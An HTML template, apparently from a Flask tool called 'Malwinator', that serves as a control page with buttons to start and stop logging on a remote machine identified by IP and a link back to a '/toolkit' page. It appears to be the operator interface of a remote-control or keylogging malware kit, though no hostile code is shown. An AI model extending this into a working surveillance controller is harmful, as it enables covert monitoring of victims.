<!DOCTYPE html>
<html>
<head>
    <title>Malwinator</title>
    <meta charset="US-ASCII">
    <link rel="stylesheet" href="{{url_for('static', filename='css/styles.css')}}">
    <script src="{{url_for('static', filename='js/log.js')}}" defer></script>
    
</head>
<body>
  <h1>{{message}}</h1>
  <h3 id="commandResult"></h3>
  <pre id = "log-data"></pre>
  <a class="btn" onclick="sendCommand('log')">Start Log</a>
  <a class="btn" onclick="sendCommand('end log')">Stop Log</a>
  <a class="btn btn-go-back" href="/toolkit?name={{name}}&ip={{ip}}">Go back</a>

  <script>
    ip = "{{ip}}"
    name = "{{name}}"
  </script>
</body>
</html>